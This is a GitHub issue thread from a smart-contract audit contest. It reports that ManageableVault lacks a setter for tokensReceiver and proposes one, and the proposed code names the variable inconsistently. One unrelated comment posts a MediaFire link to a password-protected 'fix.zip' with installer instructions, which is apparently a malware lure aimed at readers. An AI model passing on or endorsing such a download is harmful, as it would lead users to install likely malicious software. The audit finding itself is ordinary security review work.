### ISSUE TITLE
Mammoth Burlap Dachshund - There is no function to update the value of ManageableVault::tokensReceiver

### ISSUE THREAD

**Issue by sherlock-admin4** [sherlock-audit/2024-08-midas-minter-redeemer-judging#166]
Mammoth Burlap Dachshund

Low/Info

# There is no function to update the value of ManageableVault::tokensReceiver

## Summary
In the `ManageableVault` contract, there is no function to update the value of the [tokensReceiver](https://github.com/sherlock-audit/2024-08-midas-minter-redeemer/blob/main/midas-contracts/contracts/abstract/ManageableVault.sol#L76) state variable. As a result, if the `tokensReceiver` wallet is hacked, there is no way to update this address.

## Impact
If the `tokensReceiver` wallet is hacked, there is no way to update this address.

## Recommendation
Add a function to update `ManageableVault::tokensReceiver` state variable:
```Solidity
function setTokenReceiver(address receiver) external onlyVaultAdmin {
    _validateAddress(receiver, true);
    tokenReceiver = receiver;
    emit SetTokenReceiver(msg.sender, receiver);
}
```

**Comment by c0ffincolors** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by nguyenquan715** [comment]
Escalate
I believe this issue is similar to issue #111; it was just evaluated with the wrong severity. Therefore, I think it deserves to receive a reward.

**Comment by nguyenquan715** [comment]
Escalate
I believe this issue is similar to issue #111 ; it was just evaluated with the wrong severity. Therefore, I think it deserves to receive a reward.
